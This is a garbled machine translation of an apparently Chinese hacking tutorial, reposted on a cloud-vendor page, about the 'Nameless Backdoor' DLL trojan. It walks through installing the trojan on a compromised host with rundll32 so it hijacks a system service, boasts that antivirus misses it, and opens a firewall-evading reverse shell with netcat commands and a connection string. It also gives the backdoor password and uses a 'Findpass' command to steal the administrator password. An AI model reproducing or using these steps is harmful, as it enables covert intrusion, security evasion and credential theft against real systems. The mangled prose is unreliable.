New Trojan Horse Nameless backdoor Revenge (figure) _ Vulnerability Research

Source: Internet
Author: User
Tags file upload administrator password
Nameless Backdoor is a new type of DLL Trojan, this Trojan was born not long, but is definitely a very potential Trinidad colt.
Speaking of the predecessor of Nameless backdoor, I had to mention the bits and Wineggdrop portless of Yung. These two well-known Trojan horse once all scenery, can be said to be the veteran of the Trojan Horse. The nameless Backdoor is a collection of the above two Trojans, the advantages of the process manager in the target machine can not see, usually no port, providing forward connection and reverse connection two kinds of functions. At the same time nameless backdoor to remove all the shortcomings, such as the rebound of the Cmd.exe process, in the target machine process management can also be hidden without using BITS service, etc. (MA: Do not start mouth, no process, see Firewall and anti-virus software can also take me how to do!) Mad at you, haha).

Nameless Backdoor Practical Exercises

Will nameless backdoor installed on the remote host to connect the Trojan control host, like a virus in the antivirus software and firewall under the nose, but silent without the dark war.

One, with the wind into the night-installation

Download Nameless Backdoor Trojan, the package has two files named NameLess.dll DLL, a pack compression plus the shell, one is unpack uncompressed shell. First in the local use a variety of anti-virus software scan the two files (the author is using the latest virus KV2005), but has always been known to antivirus ability KV2005 unexpectedly to these two Trojan files turned a blind eye. Ah, this can be assured in any environment under the installation.

How to install the Trojan to the remote computer? Of course, the simplest is to scan the computer to attack the system vulnerabilities, and then attack intrusion control. A lot of ways, anyway, you get control of the remote host, the above any "NameLess.dll" file uploaded to the remote host. Here the author is using ttelnet remote connection, write an FTP download the bat file, directly in the local establishment of an FTP server, through the FTP server to download uploaded files (these content before the magazine, here is not too much explanation). The following key to see how I install the Trojan file it!

In the Remote ttelnet Command window, switch to the file upload directory and enter the following command (Figure 1):

Rundll32 Nameless.dll,install
After executing the command, the rear door is installed successfully, the back door will automatically replace the system service Sens ServiceDll files, after the computer reboot to Svchost.exe boot.

Tips: Because nameless backdoor is a DLL Trojan, so in the installation and start-up process, the remote host anti-virus software will not have any hint and reaction.

Second, through the wall fine silent--connection

Install and start the process of successfully finished anti-virus software, below see nameless backdoor How to let the firewall powerless.

Tip: There are two ways to connect nameless backdoor: Forward connection and reverse connection, in which a reverse connection allows the firewall to give no hint. At the same time, nameless backdoor uses port multiplexing when connecting back doors, and can easily penetrate a variety of firewalls by reusing any port that is open to the system process.

We first need to scan which ports are open on a remote host, assuming that 139 ports are open on a remote host (IP address: 192.168.1.11), you can open a command window locally, switch to the directory where the Swiss saber NC is located, and run the following command:
Nc-l-P 12345
The command will listen to Port 12345 locally and then open a command window and enter the following command (Figure 2):

NC 192.168.1.11 139
Enter the following when the connection is established (Figure 3):


dargun|192.168.1.11:12345
The IP address can be changed according to the specific situation. command execution, in just the listening window can see the connection prompt: "Enter Password:", enter the password 158352692 can be successful landing remote host and not be found by the firewall! (If I'm a firewall, I must be mad, ha)

Three, for what I want to be--control

Successful "gas dead" antivirus software and "crazy" firewall, now you can control the remote host. Nameless Backdoor's power is also reflected in its control function, connecting to the remote host, enter the Help command, you can see detailed command assistance information (Figure 4). If you have used WinShell or Wineggdropshell, you should be familiar with the back door of this model, but even if you have never used such a backdoor, it will feel very simple.

Javascript:resizepic (This) border=0>


1. Smart Theft Administrator Password
What do you do when you connect to a remote host? I have to think about it ... Oh, look at the administrator password is how much it!
In the Command window directly enter the "Findpass" command, you will soon be able to see the password of the administrator (Figure 5), it is simple enough!

Javascript:resizepic (This) border=0>

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.